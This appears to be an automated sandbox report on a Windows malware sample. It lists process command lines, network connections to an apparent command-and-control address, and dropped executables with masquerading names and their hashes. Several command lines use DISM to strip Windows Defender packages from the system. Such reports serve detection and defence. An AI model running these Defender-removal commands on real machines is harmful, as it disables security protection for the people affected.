C:\Users\Admin\AppData\Local\Temp\AA47FAFD-C26F-4249-801D-B46DB82C2EA3\dismhost.exe {3C79E263-B682-4DFC-B0E1-0CBD044C52B5}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\62FB9DB2-9133-4809-94F1-C30E850FFA2C\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\62FB9DB2-9133-4809-94F1-C30E850FFA2C\dismhost.exe {0F561E13-71E2-411F-AC3A-C0E4A16C8794}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\CEB8ED30-4469-43B8-845D-136C5A9ACA43\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\CEB8ED30-4469-43B8-845D-136C5A9ACA43\dismhost.exe {5681E6E7-62D7-4F59-8CA9-B048C8416A8E}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~ /NoRestart
C:\Users\Admin\AppData\Local\Temp\B9176574-69F7-430A-A225-5140D0BB8FF4\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\B9176574-69F7-430A-A225-5140D0BB8FF4\dismhost.exe {78FBFFFD-E195-4FF7-85F7-6AAB0BB570B0}
Network
| Country | Destination | Domain | Proto |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:5200 | tcp |
Files
memory/980-54-0x00000000766D1000-0x00000000766D3000-memory.dmp
\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
memory/1552-59-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
memory/1352-66-0x0000000000000000-mapping.dmp
\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
C:\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
memory/456-71-0x0000000000000000-mapping.dmp
\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
C:\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
memory/1672-77-0x0000000000000000-mapping.dmp
C:\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
memory/2044-81-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
memory/992-88-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/364-80-0x0000000000000000-mapping.dmp
memory/992-86-0x0000000000000000-mapping.dmp
\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
C:\Users\Admin\AppData\Local\Temp\1BCB.tmp\1BCC.tmp\1BCD.bat
| MD5 | a9364ef8f38cb959002706b2cc5ca9b4 |
| SHA1 | 4fbfdd5dbab4c63cdae4876c16f09d0e2d83152a |
| SHA256 | 6eba0633df1319abc32f0a5e5464449b2648db207c7176d0e553dc9fe50f5b27 |
| SHA512 | a3496fc402264166470f9be89712eeff3f1ec7d8fde3d0bb4805d852dd6f4a426d5695895831faa53411d1d73fdcf24a8c6303a8898926f6af66a7589e32d4f3 |
memory/1016-91-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1BBC.tmp\1BBD.tmp\1BBE.bat
| MD5 | 3c92f725b696f48b1ae5386c6b88147d |
| SHA1 | 7d80fab21ff225acdefbe3c33e11d57dbd58244b |
| SHA256 | 50b7883ad90bcf0b20671b7f0de20d11e4dd88aa2d17cc36b0b0171ca9e800d2 |
| SHA512 | ceedc8835db458884cd49918981965610e2804e0dc42d2ae6eb3aa4c5c281b684978fa73a934faf513184a40fd6b8db8909e90ad86ee152cb63990a87f9c5d03 |
memory/2000-93-0x0000000000000000-mapping.dmp
memory/2004-94-0x0000000000000000-mapping.dmp
memory/1740-96-0x0000000000000000-mapping.dmp
memory/1352-97-0x0000000000400000-0x000000000043D000-memory.dmp
memory/1912-95-0x0000000000000000-mapping.dmp
memory/1604-98-0x0000000000000000-mapping.dmp
memory/1296-99-0x0000000000000000-mapping.dmp
memory/1460-100-0x0000000000000000-mapping.dmp
memory/744-102-0x0000000000000000-mapping.dmp
memory/1648-101-0x0000000000000000-mapping.dmp
memory/1836-103-0x0000000000000000-mapping.dmp
memory/1060-104-0x0000000000000000-mapping.dmp
memory/1520-105-0x0000000000000000-mapping.dmp
memory/748-106-0x0000000000000000-mapping.dmp
memory/1384-107-0x0000000000000000-mapping.dmp
memory/1664-108-0x0000000000000000-mapping.dmp
memory/904-109-0x0000000000000000-mapping.dmp
memory/1300-110-0x0000000000000000-mapping.dmp
memory/1900-111-0x0000000000000000-mapping.dmp
memory/1184-112-0x0000000000000000-mapping.dmp
memory/1112-114-0x0000000000000000-mapping.dmp
memory/2036-113-0x0000000000000000-mapping.dmp
memory/2028-117-0x0000000000000000-mapping.dmp
memory/1356-118-0x0000000000000000-mapping.dmp
memory/1080-119-0x0000000000000000-mapping.dmp
memory/1668-120-0x0000000000000000-mapping.dmp
memory/1752-121-0x0000000000000000-mapping.dmp
memory/900-122-0x0000000000000000-mapping.dmp
memory/644-123-0x0000000000000000-mapping.dmp
memory/1196-124-0x0000000000000000-mapping.dmp
memory/1580-126-0x0000000000000000-mapping.dmp
memory/1640-127-0x0000000000000000-mapping.dmp
memory/1092-128-0x0000000000000000-mapping.dmp
memory/1040-125-0x0000000000000000-mapping.dmp
memory/676-116-0x0000000000000000-mapping.dmp
memory/584-115-0x0000000000000000-mapping.dmp
memory/1016-129-0x0000000000000000-mapping.dmp
memory/2000-130-0x0000000000000000-mapping.dmp
memory/2004-131-0x0000000000000000-mapping.dmp
memory/1936-132-0x0000000000000000-mapping.dmp
memory/940-133-0x0000000000000000-mapping.dmp
memory/972-134-0x0000000000000000-mapping.dmp
memory/1056-135-0x0000000000000000-mapping.dmp
memory/1564-136-0x0000000000000000-mapping.dmp
memory/432-137-0x0000000000000000-mapping.dmp
memory/740-138-0x0000000000000000-mapping.dmp
memory/1504-139-0x0000000000000000-mapping.dmp
memory/1628-140-0x0000000000000000-mapping.dmp
memory/1404-141-0x0000000000000000-mapping.dmp
memory/1900-142-0x0000000000000000-mapping.dmp
memory/664-143-0x0000000000000000-mapping.dmp
memory/1688-144-0x0000000000000000-mapping.dmp
memory/2036-145-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismHost.exe
| MD5 | 9a821d8d62f4c60232b856e98cba7e4f |
| SHA1 | 4ec5dcbd43ad3b0178b26a57b8a2f41e33a48df5 |
| SHA256 | a5b3bf53bcd3c0296498383837e8f9eb7d610c535521315a96aa740cf769f525 |
| SHA512 | 1b5273a52973dac77ad0ef7aa1dda929a782d762ab8489eb90dff1062dd4cc01e4f7f4157266a2abcf8941e91cf4aa5603de1dd8ee871524748e0989ebaa37d3 |
memory/1292-148-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismHost.exe
| MD5 | 9a821d8d62f4c60232b856e98cba7e4f |
| SHA1 | 4ec5dcbd43ad3b0178b26a57b8a2f41e33a48df5 |
| SHA256 | a5b3bf53bcd3c0296498383837e8f9eb7d610c535521315a96aa740cf769f525 |
| SHA512 | 1b5273a52973dac77ad0ef7aa1dda929a782d762ab8489eb90dff1062dd4cc01e4f7f4157266a2abcf8941e91cf4aa5603de1dd8ee871524748e0989ebaa37d3 |
memory/584-147-0x0000000000000000-mapping.dmp
memory/568-150-0x0000000000000000-mapping.dmp
memory/1668-151-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismCorePS.dll
| MD5 | 5488e381238ff19687fdd7ab2f44cfcc |
| SHA1 | b90fa27ef6a7fc6d543ba33d5c934180e17297d3 |
| SHA256 | abaada27d682b0d7270827c0271ac04505800b11d04b764562e4baa2cbc306a0 |
| SHA512 | 933e99749c68b3e9fe290fe4a1d8c90732ba13092d8cd9cac64f8e6583c8dcfbf25a4bea122966bc5d7d92e3a21210365a03b52274d25d704de52631e1fb0412 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismCorePS.dll
| MD5 | 5488e381238ff19687fdd7ab2f44cfcc |
| SHA1 | b90fa27ef6a7fc6d543ba33d5c934180e17297d3 |
| SHA256 | abaada27d682b0d7270827c0271ac04505800b11d04b764562e4baa2cbc306a0 |
| SHA512 | 933e99749c68b3e9fe290fe4a1d8c90732ba13092d8cd9cac64f8e6583c8dcfbf25a4bea122966bc5d7d92e3a21210365a03b52274d25d704de52631e1fb0412 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\wdscore.dll
| MD5 | 7b38d7916a7cd058c16a0a6ca5077901 |
| SHA1 | f79d955a6eac2f0368c79f7ba8061e9c58ba99b2 |
| SHA256 | 3f6dd990e2da5d3bd6d65a72cbfb0fe79eb30b118a8ad71b6c9bb5581a622dce |
| SHA512 | 2d22fe535f464f635d42e5b016741b9caf173da372e4563a565fa1e294581f44330c61e08edfe4c08a341ebd708e2ad08614161c0ee54e8dea99452b87d1e710 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\wdscore.dll
| MD5 | 7b38d7916a7cd058c16a0a6ca5077901 |
| SHA1 | f79d955a6eac2f0368c79f7ba8061e9c58ba99b2 |
| SHA256 | 3f6dd990e2da5d3bd6d65a72cbfb0fe79eb30b118a8ad71b6c9bb5581a622dce |
| SHA512 | 2d22fe535f464f635d42e5b016741b9caf173da372e4563a565fa1e294581f44330c61e08edfe4c08a341ebd708e2ad08614161c0ee54e8dea99452b87d1e710 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismprov.dll
| MD5 | 8ca117cb9338c0351236939717cb7084 |
| SHA1 | baa145810d50fdb204c8482fda5cacaaf58cdad0 |
| SHA256 | f351c3597c98ea9fe5271024fc2ccf895cc6a247fb3b02c1cdb68891dac29e54 |
| SHA512 | 35b4be68666d22f82d949ad9f0ce986779355e7d2d8fd99c0e2102cd364aba4a95b5805269261a9205c1130bdd1f5101d16146d9334c27796c7f41f2c3166c35 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismProv.dll
| MD5 | 8ca117cb9338c0351236939717cb7084 |
| SHA1 | baa145810d50fdb204c8482fda5cacaaf58cdad0 |
| SHA256 | f351c3597c98ea9fe5271024fc2ccf895cc6a247fb3b02c1cdb68891dac29e54 |
| SHA512 | 35b4be68666d22f82d949ad9f0ce986779355e7d2d8fd99c0e2102cd364aba4a95b5805269261a9205c1130bdd1f5101d16146d9334c27796c7f41f2c3166c35 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\OSProvider.dll
| MD5 | e7caed467f80b29f4e63ba493614dbb1 |
| SHA1 | 65a159bcdb68c7514e4f5b65413678c673d2d0c9 |
| SHA256 | 2c325e2647eb622983948cc26c509c832e1094639bb7af0fb712583947ad019c |
| SHA512 | 34952d8a619eb46d8b7ec6463e1e99f1c641ce61c471997dd959911ae21d64e688d9aa8a78405faa49a652675caf40d8e9e5a07de30257f26da4c65f04e2181e |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\OSProvider.dll
| MD5 | e7caed467f80b29f4e63ba493614dbb1 |
| SHA1 | 65a159bcdb68c7514e4f5b65413678c673d2d0c9 |
| SHA256 | 2c325e2647eb622983948cc26c509c832e1094639bb7af0fb712583947ad019c |
| SHA512 | 34952d8a619eb46d8b7ec6463e1e99f1c641ce61c471997dd959911ae21d64e688d9aa8a78405faa49a652675caf40d8e9e5a07de30257f26da4c65f04e2181e |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\LogProvider.dll
| MD5 | 62de64dc805fd98af3ada9d93209f6a9 |
| SHA1 | 392ba504973d626aaf5c5b41b184670c58ec65a7 |
| SHA256 | 83c0f61cc8fc01c789c07dd25f58862e0710088e6887716b1be9ee9f149adefc |
| SHA512 | 7db48f240df566be9a4b836807f97e8169d58edfa699de69be35b3977e442da3fea4f8b38d359d50f4d5afcf8547c8f66329e5ec855efbc5402ce88458d67e28 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\LogProvider.dll
| MD5 | 62de64dc805fd98af3ada9d93209f6a9 |
| SHA1 | 392ba504973d626aaf5c5b41b184670c58ec65a7 |
| SHA256 | 83c0f61cc8fc01c789c07dd25f58862e0710088e6887716b1be9ee9f149adefc |
| SHA512 | 7db48f240df566be9a4b836807f97e8169d58edfa699de69be35b3977e442da3fea4f8b38d359d50f4d5afcf8547c8f66329e5ec855efbc5402ce88458d67e28 |
C:\Windows\Logs\DISM\dism.log
| MD5 | da1e654bf23e9d993c1aa4d6c86b097e |
| SHA1 | 4aaa21de90b3466f175901734f295852d4162955 |
| SHA256 | a4b1f5d725de107e0b76be5579732c633629c63770d23a4f178ba7315f567020 |
| SHA512 | b053e434e76df2ef63a1519b495ddaf2f7e5b044ae788a809a3a121ca88c799304f53675773f52f8de93db008bf3a657196cbd37593b25bbb85fca4e5169e14b |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\CbsProvider.dll
| MD5 | efcb002abc3529d71b61e6fb6434566c |
| SHA1 | a25aca0fc9a1139f44329b28dc13c526965d311f |
| SHA256 | b641d944428f5b8ffb2fefd4da31c6a15ba84d01130f2712d7b1e71c518805bd |
| SHA512 | 10ee2b20f031ca5a131a9590599f13d3f0029352376705a2d7d2134fcd6535a3b54356d1b4d0b3fb53ac5ca4f034f9afb129a4f601159938680197ea39ea0687 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\CbsProvider.dll
| MD5 | efcb002abc3529d71b61e6fb6434566c |
| SHA1 | a25aca0fc9a1139f44329b28dc13c526965d311f |
| SHA256 | b641d944428f5b8ffb2fefd4da31c6a15ba84d01130f2712d7b1e71c518805bd |
| SHA512 | 10ee2b20f031ca5a131a9590599f13d3f0029352376705a2d7d2134fcd6535a3b54356d1b4d0b3fb53ac5ca4f034f9afb129a4f601159938680197ea39ea0687 |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\CompatProvider.dll
| MD5 | 6a4bd682396f29fd7df5ab389509b950 |
| SHA1 | 46f502bec487bd6112f333d1ada1ec98a416d35f |
| SHA256 | 328e5fbb6f3088fd759d855e656cd4c477b59f6a43a247954d1fd9050815e6cb |
| SHA512 | 35ced350482c94d22c85cd1b98890d01baed0da1c35a114d2cd6373d08969be764282f7a9d8ff0dd1dff3fae42e4ea20d3194c352364901b23ca2f375bd02751 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\CompatProvider.dll.mui
| MD5 | 9085b83968e705a3be5cd7588545a955 |
| SHA1 | f0a477b353ca3e20fa65dd86cb260777ff27e1dd |
| SHA256 | fe0719cf624e08b5d6695ee3887358141d11316489c4ea97d2f61a4d2b9060cd |
| SHA512 | b7f12f7ac1e6942f24f4bf35444f623cc93f8a047ebc754b9599d5df16cab4d3745729d11b4a3abfdc06a671e55ac52cac937badd808825906f52885f16f2c1c |
\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\CompatProvider.dll
| MD5 | 6a4bd682396f29fd7df5ab389509b950 |
| SHA1 | 46f502bec487bd6112f333d1ada1ec98a416d35f |
| SHA256 | 328e5fbb6f3088fd759d855e656cd4c477b59f6a43a247954d1fd9050815e6cb |
| SHA512 | 35ced350482c94d22c85cd1b98890d01baed0da1c35a114d2cd6373d08969be764282f7a9d8ff0dd1dff3fae42e4ea20d3194c352364901b23ca2f375bd02751 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\CbsProvider.dll.mui
| MD5 | 724ee7133b1822f7ff80891d773fde51 |
| SHA1 | d10dff002b02c78e624bf83ae8a6f25d73761827 |
| SHA256 | d13f068f42074b3104987bfed49fbf3a054be6093908ed5dea8901887dddb367 |
| SHA512 | 1dfd236537d6592a19b07b5e1624310c67adff9e776e6d2566b9e7db732588988f9ae7352df6c3b53c058807d8ed55fafc2004a2d6dc2f3f6c9e16445699f17b |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\CompatProvider.dll
| MD5 | 6a4bd682396f29fd7df5ab389509b950 |
| SHA1 | 46f502bec487bd6112f333d1ada1ec98a416d35f |
| SHA256 | 328e5fbb6f3088fd759d855e656cd4c477b59f6a43a247954d1fd9050815e6cb |
| SHA512 | 35ced350482c94d22c85cd1b98890d01baed0da1c35a114d2cd6373d08969be764282f7a9d8ff0dd1dff3fae42e4ea20d3194c352364901b23ca2f375bd02751 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismCore.dll
| MD5 | f2b0771a7cd27f20689e0ab787b7eb7c |
| SHA1 | eb56e313cd23cb77524ef0db1309aebb0b36f7ef |
| SHA256 | 7c675710ae52d5e8344465f1179ec4e03c882d5e5b16fc0ba9564b1ea121638f |
| SHA512 | 5ebd4685e5b949d37c52bb1f2fe92accfa48dd4ef585c898f3982eb52f618064fc95c2f98532ca3e7007d0ef71c1fe91887ce3dc0a563f09bc2c5f59f3a3082a |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\dismprov.dll.mui
| MD5 | 9bc5d6eb3e2d31bbdbffe127a1b3cdbf |
| SHA1 | b253025c442aefe338b4c7ebea2f7d808abc9618 |
| SHA256 | 55e9ae098def76e7388d7d069746dbd136ae243357ece23b77f2365f0b2ff76f |
| SHA512 | f9968554737d181d4b7d0366f40f0c9a2039b59796986964413fa08f031f5529411b2741eb8ea3d8c312112b2038e6a58d891d090a42672c3d1c782b859f2e08 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DmiProvider.dll
| MD5 | fc2db5842190c6e78a40cd7da483b27c |
| SHA1 | e94ee17cd06fb55d04bef2bdfcf5736f336e0fa0 |
| SHA256 | e6c93305d886bff678bd83b715bb5c5cbb376b90b973d9dd6844fac808de5c82 |
| SHA512 | d5d32b894a485447d55499a2f1e02a8b33fb74081f225b8e2872995491a37353cf8022f46feeb3ca363b2e172ab89e29ab9a453692d1a964ca08d40230574bf6 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\FolderProvider.dll
| MD5 | c9d74156913061be6c51d8fc3acf8e93 |
| SHA1 | 4a4c6473a478256e4c78b423e918191118e01093 |
| SHA256 | af0a38b4e95a50427b215eebc185bb621187e066b8b7373fb960eac0551bec37 |
| SHA512 | c12f75a6451881878a7a9ed5de61d157ea36f53aa41abf7660e1cc411b2ddd70ff048a307b1440cfdf1b269aeff77da8cc163ad19e9e3a294a5128f170f37047 |
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\IntlProvider.dll
| MD5 | bbb9e4fa2561f6a6e5ccf25da069ac1b |
| SHA1 | 2d353ec70c7a13ac5749d2205ac732213505082a |
| SHA256 | b92cf901027901d7066e9ee7ac8f3b48a99cfb3a3ddd8d759cb77295148943c1 |
| SHA512 | 01f4e6d51a0acb394693191b78cefa28759903036636a1d64f90c60dc59c948c78dd38df6fb2be149245622eadf8b2627c6767bf2aa2e0e56e6b52f0b91cc79e |
